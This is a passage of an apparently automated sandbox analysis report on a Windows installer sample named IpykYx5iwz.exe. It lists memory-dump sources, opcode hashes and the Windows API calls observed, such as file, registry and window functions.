                                                  • Instruction Fuzzy Hash: E6C04C30326A01DAD6515F209F087177A64BB60B41F11443DA246E21E0DA359415E92D
                                                  APIs
                                                  • EnumWindows.USER32(00000000), ref: 73402AF7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1818278382.0000000073401000.00000020.00000001.01000000.00000006.sdmp, Offset: 73400000, based on PE: true
                                                  • Associated: 00000000.00000002.1818246559.0000000073400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000000.00000002.1818304122.0000000073403000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000000.00000002.1818325879.0000000073405000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_73400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: EnumWindows
                                                  • String ID:
                                                  • API String ID: 1129996299-0
                                                  • Opcode ID: 7ab7a00040de97fd615427345528b94eabc008392649a6bd7b0b8e941a8fc71f
                                                  • Instruction ID: 7cc8bd9f211d43b3a04b1e10f2dcd7cc0f0199f7359ec4367b5b03c47730585f
                                                  • Opcode Fuzzy Hash: 7ab7a00040de97fd615427345528b94eabc008392649a6bd7b0b8e941a8fc71f
                                                  • Instruction Fuzzy Hash: 6B416FB3700218EFEB2DAFA5DA80B5937B9EB44318F2494F9D949F63C0C63895418F58
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: wsprintf
                                                  • String ID:
                                                  • API String ID: 2111968516-0
                                                  • Opcode ID: e17dcc65da12fa7f7507a6bc2d242c9522ddbfad326095c9a15d5b6e59271a88
                                                  • Instruction ID: f7bed4abd913bf6fc464966fb6c19a800e0e64c640bfd3592dafb9d6802a6cff
                                                  • Opcode Fuzzy Hash: e17dcc65da12fa7f7507a6bc2d242c9522ddbfad326095c9a15d5b6e59271a88
                                                  • Instruction Fuzzy Hash: 6F21D870C0428AAECF218F644A496BFBB709F11318F14847FE891B63D2C5BD8985CB1D
                                                  APIs
                                                  • MoveFileA.KERNEL32(00000000,00000000), ref: 00401685
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: FileMove
                                                  • String ID:
                                                  • API String ID: 3562171763-0
                                                  • Opcode ID: 1dee3def93436aeb5a84ae895b3a113aac818a50224140a247bf5802f6714415
                                                  • Instruction ID: 875ef897b1c8220e908ce9d70ba70a7e8e4cbf3698da85ce3a0217b7c26b2a9a
                                                  • Opcode Fuzzy Hash: 1dee3def93436aeb5a84ae895b3a113aac818a50224140a247bf5802f6714415
                                                  • Instruction Fuzzy Hash: B0F0963160421163CB117BB95F4DE5F25A8DF46328B21023BF021B21D2D6BC8501865F
                                                  APIs
                                                  • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 0040239C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: PrivateProfileStringWrite
                                                  • String ID:
                                                  • API String ID: 390214022-0
                                                  • Opcode ID: 2ef620b7f16f149139dfc3728134166f5ac205edbe637a3672e148c84da2c520
                                                  • Instruction ID: 00be3bb5cfe09e5788b1f0bae87ec1d7a9c2ea1fc05a431f2d4690520b5a9855
                                                  • Opcode Fuzzy Hash: 2ef620b7f16f149139dfc3728134166f5ac205edbe637a3672e148c84da2c520
                                                  • Instruction Fuzzy Hash: FEE04F31A007256BDB213EB25E8ED6F3669AB84744B16113FFA01BA2C2D9BC1C05C26D
                                                  APIs
                                                  • RegCreateKeyExA.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402BDD,00000000,?,?), ref: 0040601E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
                                                  • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                  • Instruction ID: 7aa5a059cc8f13803465185a3c8b2217c2fd81e6017869bfeb287b42a0244da8
                                                  • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                  • Instruction Fuzzy Hash: 29E0E67215010ABEEF199F50DD0AD7B375DEB04304F00452EFA06D4051E6B5AD306A35
                                                  APIs
                                                  • ReadFile.KERNELBASE(0040A130,00000000,00000000,00000000,00000000,004138D8,0040B8D8,00403339,0040A130,0040A130,0040323D,004138D8,00004000,?,00000000,004030E7), ref: 00405D66
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID:
                                                  • API String ID: 2738559852-0
                                                  • Opcode ID: e23cbb0757ad9fa8c6c9682000f81612da8d127e18228ddbd7f099cf91b7f4dd
                                                  • Instruction ID: 5fe52956bc080eb5845b2a6899c4c32d397a31a93509f9c809a3324e3603bd48
                                                  • Opcode Fuzzy Hash: e23cbb0757ad9fa8c6c9682000f81612da8d127e18228ddbd7f099cf91b7f4dd
                                                  • Instruction Fuzzy Hash: F9E0B632210A5EABDF109E559C04FEB7B6CEF05260F048437F965E6160E671E8219AA4
                                                  APIs
                                                  • WriteFile.KERNELBASE(0040A130,00000000,00000000,00000000,00000000,0040CB66,0040B8D8,004032BD,0040B8D8,0040CB66,004138D8,00004000,?,00000000,004030E7,00000004), ref: 00405D95
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: FileWrite
                                                  • String ID:
                                                  • API String ID: 3934441357-0
                                                  • Opcode ID: d47d29d2c4ad98e9097244963089aa7711ad8f9da7a01510603535aa68a2578c
                                                  • Instruction ID: 88055a129495e0a1532d88cdf268e4fa11f8ad8fa0993c615db816ddd8659a66
                                                  • Opcode Fuzzy Hash: d47d29d2c4ad98e9097244963089aa7711ad8f9da7a01510603535aa68a2578c
                                                  • Instruction Fuzzy Hash: CEE0EC3221065AABDF909F559C04AEB7B6CEF45360F008837F915E6150D635E8219BA8
                                                  APIs
                                                  • VirtualProtect.KERNELBASE(7340404C,00000004,00000040,7340403C), ref: 7340293F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1818278382.0000000073401000.00000020.00000001.01000000.00000006.sdmp, Offset: 73400000, based on PE: true
                                                  • Associated: 00000000.00000002.1818246559.0000000073400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000000.00000002.1818304122.0000000073403000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000000.00000002.1818325879.0000000073405000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_73400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: ProtectVirtual
                                                  • String ID:
                                                  • API String ID: 544645111-0
                                                  • Opcode ID: c47cced69bbd12c552915adf438287690655833c53fb04bb2af044cd6c7d3f8f
                                                  • Instruction ID: 194e7506b5679330f4da3d7234d5364175c081c3201ec86eb9967898fd119bed
                                                  • Opcode Fuzzy Hash: c47cced69bbd12c552915adf438287690655833c53fb04bb2af044cd6c7d3f8f
                                                  • Instruction Fuzzy Hash: 41F092B37092A0DED368FF6A87447063EE4A399359F21A5EAE59CF6382E33440448F15
                                                  APIs
                                                  • GetPrivateProfileStringA.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 004023DA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: PrivateProfileString
                                                  • String ID:
                                                  • API String ID: 1096422788-0
                                                  • Opcode ID: 43d1ef68d34db13a5b9bb34e680415942fdcff1b2a8b4def309f1089b099fd68
                                                  • Instruction ID: 613f8938e3483f022966d8f88ece12aded35770f19abf94ca1dc8db90175e5cf
                                                  • Opcode Fuzzy Hash: 43d1ef68d34db13a5b9bb34e680415942fdcff1b2a8b4def309f1089b099fd68
                                                  • Instruction Fuzzy Hash: 28E01A30904309BADB016FB08D09EBE3E79EF05710F10042AB9506A0D2E6B89542971D
                                                  APIs
                                                  • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,?,?,?,?,?,00406055,?,?,?,?,00000002,Call), ref: 00405FEB
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: Open
                                                  • String ID:
                                                  • API String ID: 71445658-0
                                                  • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                  • Instruction ID: a79ed491604e732be9e8589d5993cb0c6093b0d914abb251d3aa64a9826405fb
                                                  • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                  • Instruction Fuzzy Hash: F2D0123200420EBBDF119E90DD01FAB371DEB04350F104426FE16A4191D77AD930AF24
                                                  APIs
                                                  • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: AttributesFile
                                                  • String ID:
                                                  • API String ID: 3188754299-0
                                                  • Opcode ID: cadbb60fad11aca41fa8821db0c0d6396017327b99a71bfa173ef47d4dea764f
                                                  • Instruction ID: 414020ceaf1b9bfe3b374f8d441e9348849d88ca446d9646f494e55c126a457c
                                                  • Opcode Fuzzy Hash: cadbb60fad11aca41fa8821db0c0d6396017327b99a71bfa173ef47d4dea764f
                                                  • Instruction Fuzzy Hash: 09D0127270420097CB11DFA8EB08A5D77A5EB55325F210537D111F21D1D2B885459759
                                                  APIs
                                                  • SendMessageA.USER32(00010450,00000000,00000000,00000000), ref: 0040422D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  • Opcode ID: 36dc9921a482444c8f32a3e2d649131ff3b3bcc632906422d004d469ccc3c4a4
                                                  • Instruction ID: 212e39722ed4517457d92134c98ec16180e1b8b542dfb9669583df3824257a50
                                                  • Opcode Fuzzy Hash: 36dc9921a482444c8f32a3e2d649131ff3b3bcc632906422d004d469ccc3c4a4
                                                  • Instruction Fuzzy Hash: 60C04C717406017AEA208B509D49F0677686B50741F2544697660A60D4C6B4D510DA1D
                                                  APIs
                                                  • SendMessageA.USER32(00000028,?,00000001,00404034), ref: 00404212
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  • Opcode ID: 1c02a5868d14bc1e19ebeed3d404449871defacebd96b9282790bb16d711c782
                                                  • Instruction ID: 10cfd25431557a88665167ebbf17620150c727a9bd7140e907e4ecff4ccdfc3e
                                                  • Opcode Fuzzy Hash: 1c02a5868d14bc1e19ebeed3d404449871defacebd96b9282790bb16d711c782
                                                  • Instruction Fuzzy Hash: 30B09236280A00AAEE218B00DE09F457AA2E7A8742F028028B250240B0CAB200A1DB08
                                                  APIs
                                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040303A,?), ref: 0040334A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: FilePointer
                                                  • String ID:
                                                  • API String ID: 973152223-0
                                                  • Opcode ID: af556f1437a27586b8d302be8c6d190c2fb2fb51029204f11d8d070fc2108142
                                                  • Instruction ID: 81fdcbbc46e9ac73494c3809a02cbb86869920566b24394b282a4516d046c7b0
                                                  • Opcode Fuzzy Hash: af556f1437a27586b8d302be8c6d190c2fb2fb51029204f11d8d070fc2108142
                                                  • Instruction Fuzzy Hash: 32B01231140300BFDA214F00DF09F057B21AB90700F10C034B384780F086711075EB0D
                                                  APIs
                                                  • KiUserCallbackDispatcher.NTDLL(?,00403FCD), ref: 004041FB
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: CallbackDispatcherUser
                                                  • String ID:
                                                  • API String ID: 2492992576-0
                                                  • Opcode ID: 170f1306ebf328c26108ef1010d48ef1549a1a3b4841237e6a0462b6e89b4d13
                                                  • Instruction ID: bd711969ba89efe8629f231cafa01baa053f2358784498ab8b3cf30639ef5a41
                                                  • Opcode Fuzzy Hash: 170f1306ebf328c26108ef1010d48ef1549a1a3b4841237e6a0462b6e89b4d13
                                                  • Instruction Fuzzy Hash: 55A012320000009FCB014B50EF04C057F71AB543007018435E140400338A310821FF0C
                                                  APIs
                                                  • GetDlgItem.USER32(?,000003FB), ref: 004046B0
                                                  • SetWindowTextA.USER32(00000000,?), ref: 004046DA
                                                  • SHBrowseForFolderA.SHELL32(?,00420108,?), ref: 0040478B
                                                  • CoTaskMemFree.OLE32(00000000), ref: 00404796
                                                  • lstrcmpiA.KERNEL32(Call,helsidesannoncen: Installing), ref: 004047C8
                                                  • lstrcatA.KERNEL32(?,Call), ref: 004047D4
                                                  • SetDlgItemTextA.USER32(?,000003FB,?), ref: 004047E6
                                                    • Part of subcall function 00405841: GetDlgItemTextA.USER32(?,?,00000400,0040481D), ref: 00405854
                                                    • Part of subcall function 004063AB: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\IpykYx5iwz.exe",74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,0040335F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403596,?,00000006,00000008,0000000A), ref: 00406403
                                                    • Part of subcall function 004063AB: CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406410
                                                    • Part of subcall function 004063AB: CharNextA.USER32(?,"C:\Users\user\Desktop\IpykYx5iwz.exe",74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,0040335F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403596,?,00000006,00000008,0000000A), ref: 00406415
                                                    • Part of subcall function 004063AB: CharPrevA.USER32(?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,0040335F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403596,?,00000006,00000008,0000000A), ref: 00406425
